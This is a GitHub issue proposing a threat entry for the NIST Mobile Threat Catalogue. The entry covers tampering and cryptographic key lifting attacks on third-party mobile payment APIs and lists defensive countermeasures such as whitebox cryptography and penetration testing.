search

usnistgov / mobile-threat-catalogue

NIST/NCCoE Mobile Threat Catalogue
https://pages.nist.gov/mobile-threat-catalogue
Other
142 stars 40 forks source link

New PAY threat: Vulnerabilities of 3rd party payment API for tampering and cryptographic key lifting attacks #53

Open sdog-mitre opened 8 years ago

sdog-mitre commented 8 years ago

On behalf of Prashanth Thandavamurthy of Arxan Technologies, Inc.

New Threat

Threat Category: Payment

Threat: Vulnerabilities of 3rd party payment API for code analysis/tampering and cryptographic key lifting attacks.

Threat Origin: API Attacks

http://www.cl.cam.ac.uk/~rja14/Papers/SEv2-c18.pdf

Exploit Example: None

CVE Example: None

Possible Countermeasures:

  1. Follow secure coding guidelines
  2. Use cryptographic key protection solution such as Whitebox Cryptography to ensure - a. Cryptographic keys are not discovered at any time, and are not present in static form or in runtime memory b. Data is protected at rest, in transit and in-use
  3. Protect API from reverse-engineering and code tampering/modification attacks
  4. Leverage vulnerability/penetration testing and ensure that known risks – including those identified in the OWASP mobile top 10 list, in particular, are addressed

References: None